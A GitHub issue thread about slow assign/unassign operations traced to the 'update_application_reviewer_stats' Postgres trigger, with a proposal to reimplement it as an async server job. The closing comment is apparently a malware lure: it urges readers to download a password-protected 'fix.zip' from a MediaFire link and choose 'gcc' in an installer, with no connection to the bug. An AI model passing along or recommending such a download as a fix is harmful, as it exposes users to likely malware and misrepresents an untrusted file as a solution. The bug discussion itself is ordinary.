### ISSUE TITLE
Major bug: Assigning/Unassigning taking unreasonably long time

### ISSUE THREAD

**Issue by CarlosNZ** [msupply-foundation/conforma-server#1120]
What we know:
- it's connected to the "update_application_reviewer_stats" function, which is triggered on review assignment updates (if I disable this trigger, it happens in the normal, timely manner)

What we don't know
- why only on the Live server (it's fast on Demo3 with the exact same snapshot, and that's a slower system)?
- why so slow? Have checked locally, and the number of database operations caused by the trigger shouldn't take this long, even on a slower system.

### Possible solution

In order to prevent this function blocking the update, we could re-implement it on the Server (rather than as a Postgres function), and trigger it from a notification channel. And then run is `async`, so it doesn't block the main mutation.

Still doesn't really address why it's causing such a block, but we'll be able to add more logging to it this way and have a better idea of what's causing it to run so many times.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
